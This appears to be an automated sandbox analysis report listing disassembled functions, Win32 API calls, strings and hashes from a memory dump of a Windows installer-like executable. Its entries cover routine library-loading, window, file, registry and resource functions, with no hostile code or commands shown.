String ID: ShutdownBlockReasonDestroy$user32.dll
API String ID: 1646373207-260599015
Opcode ID: bee4edb2c449a5dfd1c01cdfe9b6f7374d179aa79d7f6a8ce8d951f478ed0695
Instruction ID: d308361a71a1e4dc0c71eda52d15a5d5ca57c7b6b7e2bde91db1678b7815b427
Opcode Fuzzy Hash: bee4edb2c449a5dfd1c01cdfe9b6f7374d179aa79d7f6a8ce8d951f478ed0695
Instruction Fuzzy Hash: 8DD0A792301732626900F1F73CC1DBB0A8C89102793540077F601E1241D54DDC01156C

Function 0044F7B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004992CA), ref: 0044F7F3
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F7F9

Strings

user32.dll, xrefs: 0044F7EE
NotifyWinEvent, xrefs: 0044F7E9

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NotifyWinEvent$user32.dll
API String ID: 1646373207-597752486
Opcode ID: c3786242a14ca03a62e3406b7bd0f53fb28c80e98e7c47f23881a3d4f16b908f
Instruction ID: b1e2d04df43b1f620e0cf6c091983f233af54cc0e24e64f5668f936ad46d7efe
Opcode Fuzzy Hash: c3786242a14ca03a62e3406b7bd0f53fb28c80e98e7c47f23881a3d4f16b908f
Instruction Fuzzy Hash: 6BE012F0A417469EEB00BBF5998671A3AA0E75431CF51007BB1006A192CB7C44184F6E

Function 00499040 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00499320,00000001,00000000,00499344), ref: 0049904A
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00499050

Strings

user32.dll, xrefs: 00499045
DisableProcessWindowsGhosting, xrefs: 00499040

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 1646373207-834958232
Opcode ID: 646b07dbd550e4abdd546bdc612ddcefe778f12448e39103c2641131bf94b29c
Instruction ID: 7509a849a1c86b60682be4b60143d7a07ed98817b3ed87241ead2d9b7982c41a
Opcode Fuzzy Hash: 646b07dbd550e4abdd546bdc612ddcefe778f12448e39103c2641131bf94b29c
Instruction Fuzzy Hash: 45B09280280611909C9032BB0D02A1B0E084881728718003F3560B01CACE6D8C04543E

Function 0046469C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B6CC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F7E9,004992CA), ref: 0044B6F3
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B70B
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B71D
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B72F
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B741
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B753
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B765
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B777
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B789
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B79B
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B7AD
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B7BF
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B7D1
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B7E3
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B7F5
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B807
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B819
Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B82B

LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004992F2), ref: 004646AB
GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 004646B1

Strings

SHPathPrepareForWriteA, xrefs: 004646A1
shell32.dll, xrefs: 004646A6

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 2238633743-2683653824
Opcode ID: f4442e2486f2b5e46a00971faa36ed1fd0fe9bdb0abc79278919a1fdde299c0b
Instruction ID: 4b5030ed4f607149f6cd51c097547c25e56dbab9a2da70309a95c4064c32834c
Opcode Fuzzy Hash: f4442e2486f2b5e46a00971faa36ed1fd0fe9bdb0abc79278919a1fdde299c0b
Instruction Fuzzy Hash: A4B092E0A81641698D0077B2980790F289489A1B1CB14003F304076097EABC88100E5E

Function 0047DB00 Relevance: 6.2, APIs: 4, Instructions: 195fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,0047DC74,?,?,?,?,00000000,0047DDC9,?,?,?,00000000,?,0047DED8), ref: 0047DC50
FindClose.KERNEL32(000000FF,0047DC7B,0047DC74,?,?,?,?,00000000,0047DDC9,?,?,?,00000000,?,0047DED8,00000000), ref: 0047DC6E

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 626af9ae0c7025ae86db110923e2d8978f3bc9f77e1149f66e2b87a215601fbe
Instruction ID: 1e82c9b5cfa583a005eddcd7dd146139acf465dd78b3df19642706576ae0a9c6
Opcode Fuzzy Hash: 626af9ae0c7025ae86db110923e2d8978f3bc9f77e1149f66e2b87a215601fbe
Instruction Fuzzy Hash: F7814D70D0424DAFCF21DFA5CC41ADFBBB9EF49304F1080AAE808A7291D6399A46CF54

Function 004759E8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

Part of subcall function 0042EE90: GetTickCount.KERNEL32 ref: 0042EE96

Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD

GetLastError.KERNEL32(00000000,00475B5D,?,?,0049D1E0,00000000), ref: 00475A46

Strings

MoveFileEx, xrefs: 00475AAB
, xrefs: 00475A7E, 00475A99
LoggedMsgBox returned an unexpected value. Assuming Cancel., xrefs: 00475B1B

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CountErrorFileLastMoveTick
String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
API String ID: 2406187244-2685451598
Opcode ID: bdd100edfa0aef186b75102470bea3ad8c8c879f4a4d4cdb36382bc75decf58e
Instruction ID: a9db3c141a3770340595dd3a0637540d48bb3c3777a437ddbd25d3dfc602479e
Opcode Fuzzy Hash: bdd100edfa0aef186b75102470bea3ad8c8c879f4a4d4cdb36382bc75decf58e
Instruction Fuzzy Hash: 85415871E006099FCB10EF65D882AEE77B4EF44314F508537E414BB351D778AA058BAD

Function 00413D08 Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00413D56
GetDesktopWindow.USER32 ref: 00413E0E

Part of subcall function 00418ED0: 6FA0C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049C628), ref: 00418EEC
Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049C628), ref: 00418F09

SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CursorDesktopWindow$Show
String ID:
API String ID: 2074268717-0
Opcode ID: c82077e875ceebfb446ca8bdba497cc44f2f016adda31143cf8d95e20cbb1c8e
Instruction ID: a5e00dcc6fd9115ed5a77459d70fea990a5215d510f46849e0ce2877443e0a13
Opcode Fuzzy Hash: c82077e875ceebfb446ca8bdba497cc44f2f016adda31143cf8d95e20cbb1c8e
Instruction Fuzzy Hash: CA413771600260EFC714EF29E9C4B9677E1AB69325F16807BE404DB366DA38BD81CF58

Function 00408A64 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A85
LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AF4
LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B8F
MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BCE

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: LoadString$FileMessageModuleName
String ID:
API String ID: 704749118-0
Opcode ID: 2478aacc1cc0604c87cef9c23ce28a73e3b8baee1560f3a98c189eb7686d3011
Instruction ID: c07fd310ac7ce6f4f6bdd3d287b746ce8d52192ab59c667046e5b60d4d48b312
Opcode Fuzzy Hash: 2478aacc1cc0604c87cef9c23ce28a73e3b8baee1560f3a98c189eb7686d3011
Instruction Fuzzy Hash: 0E3134716083849BD730EB65C945BDBB7E8AB85704F40483FB6C8DB2D1EB7859048B6B

Function 0044E938 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E981

Part of subcall function 0044CFC4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CFF6

InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044EA05

Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8

IsRectEmpty.USER32(?), ref: 0044E9C7
ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E9EA

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
String ID:
API String ID: 855768636-0
Opcode ID: be830068c3edf1c95023cfeceac366b6905f068659723eff49c6974a0b69c569
Instruction ID: 77b7b7799a66ce86f667cf0b036ff1ab111c9581c09ca9d8f795578908ad38d2
Opcode Fuzzy Hash: be830068c3edf1c95023cfeceac366b6905f068659723eff49c6974a0b69c569
Instruction Fuzzy Hash: 36118C72B0034027E610BA3E8C86B5B66C99B88708F14083FB605EB3C7DE7CDC094399

Function 00495FFC Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,?,00000000), ref: 00496060
OffsetRect.USER32(?,00000000,?), ref: 0049607B
OffsetRect.USER32(?,?,00000000), ref: 00496095
OffsetRect.USER32(?,00000000,?), ref: 004960B0

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: a5b10c5c05c4c4c8690ebf0e0d14455fb01428b86b9d3b295170541a370ec2ec
Instruction ID: 8eac29a9a723dba05d0f501e7f7c311a2f3b3ed3193ada35ebb1b3014bd25ec0
Opcode Fuzzy Hash: a5b10c5c05c4c4c8690ebf0e0d14455fb01428b86b9d3b295170541a370ec2ec
Instruction Fuzzy Hash: F6215EB6700201ABCB00DE69CDC5E6BB7EEEBD4344F15CA2AF548C7389D634E9448796

Function 00417228 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00417270
SetCursor.USER32(00000000), ref: 004172B3
GetLastActivePopup.USER32(?), ref: 004172DD
GetForegroundWindow.USER32(?), ref: 004172E4

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Cursor$ActiveForegroundLastPopupWindow
String ID:
API String ID: 1959210111-0
Opcode ID: e1b8292847e1495943439bfb526301e98f20bb6a1a323b8f65a3f0d30a7d056b
Instruction ID: a3ca0b5fbe6c86dc8433d056dfe209cecf977414c0e936569190c1b416abce34
Opcode Fuzzy Hash: e1b8292847e1495943439bfb526301e98f20bb6a1a323b8f65a3f0d30a7d056b
Instruction Fuzzy Hash: 7F2180713086018BC720AF69D885ADB73B1AB48764B4545ABF855CB352D73DDC82CB49

Function 00495CB4 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(8B500000,00000008,?), ref: 00495CC9
MulDiv.KERNEL32(50142444,00000008,?), ref: 00495CDD
MulDiv.KERNEL32(F6F86FE8,00000008,?), ref: 00495CF1
MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00495D0F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
Instruction ID: f271e463c2a04687a7cd3b1fed15c38c3ae6b45cd4ce19c79766351c2a45cab8
Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
Instruction Fuzzy Hash: 78112172604604AFCB40EFA9C8C4D9B7BECEF4D320B24416AFD19DB246D634ED408BA4

Function 0041F490 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
RegisterClassA.USER32(0049A598), ref: 0041F4E4
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 46111e49518ace76b25441b5b8420e7e5a88ee32249e97549851b52d686e3228
Instruction ID: bc278c4f6faf11cefbb7876bdabff60d814ef9460a0beef0b041e337848a6ca8
Opcode Fuzzy Hash: 46111e49518ace76b25441b5b8420e7e5a88ee32249e97549851b52d686e3228
Instruction Fuzzy Hash: BB014071300104BBCB10EBA9ED81E9B779C9719314F51423BB505E72E2D6399C158BBD

Function 00454FF0 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

WaitForInputIdle.USER32(00000001,00000032), ref: 0045501C
MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045503E
GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 0045504D
CloseHandle.KERNEL32(00000001,0045507A,00455073,?,00000031,00000080,00000000,?,?,004553D3,00000080,0000003C,00000000,004553E9), ref: 0045506D

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
String ID:
API String ID: 4071923889-0
Opcode ID: aaa38026e2161bc5d10e27088da429faa58cfaab67b23fe3f60cb52595d37df2
Instruction ID: d12116b756cd226a9453b7b7c95f557e71215baafd626de0b651f5c3ff172158
Opcode Fuzzy Hash: aaa38026e2161bc5d10e27088da429faa58cfaab67b23fe3f60cb52595d37df2
Instruction Fuzzy Hash: F801F570A00A08BEEB209BA9CC12F7F7BACDF45B60F600167B904D32C2C5789D0486B8

Function 0040D020 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D037
LoadResource.KERNEL32(00400000,72756F73,0040A7D8,00400000,00000001,00000000,?,0040CF94,00000000,?,00000000,?,?,0047CFDC,0000000A,00000000), ref: 0040D051
SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7D8,00400000,00000001,00000000,?,0040CF94,00000000,?,00000000,?,?,0047CFDC), ref: 0040D06B
LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7D8,00400000,00000001,00000000,?,0040CF94,00000000,?,00000000,?), ref: 0040D075

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
Instruction ID: 36a118f2821a5a72c918f59cdb85223c1d13502428e6f53becfecf356bbc3684
Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
Instruction Fuzzy Hash: ECF062B36055046F9B04EFADA881D5B77DCDE88364310017FF908E7282DA39DD118B78

Function 00470798 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000), ref: 004707E9

Strings

Setting NTFS compression on file: %s, xrefs: 004707B7
Failed to set NTFS compression state (%d)., xrefs: 004707FA
Unsetting NTFS compression on file: %s, xrefs: 004707CF

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
API String ID: 1452528299-3038984924
Opcode ID: 0da083cedf78d204021f0c22f46e9404a6a0d1fca2abd04a8242647f3c87b887
Instruction ID: 145c5581ad0eca4b083c726d4b350626947fd7e4083fb75601c5580ae1b156b2
Opcode Fuzzy Hash: 0da083cedf78d204021f0c22f46e9404a6a0d1fca2abd04a8242647f3c87b887
Instruction Fuzzy Hash: 38016C31D0D148A9CB04D7ED60416DDBFA89F09304F45C5EFA459D7282D7B915088BDA

Function 00455E44 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B856,?,?,?,?,?,00000000,0045B87D), ref: 00455E80
RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B856,?,?,?,?,?,00000000), ref: 00455E89
RemoveFontResourceA.GDI32(00000000), ref: 00455E96
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455EAA

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
String ID:
API String ID: 4283692357-0
Opcode ID: d198827404060030b3dfc17e22509fcb3a77ecf8fff02d6a53b0f294283eb161
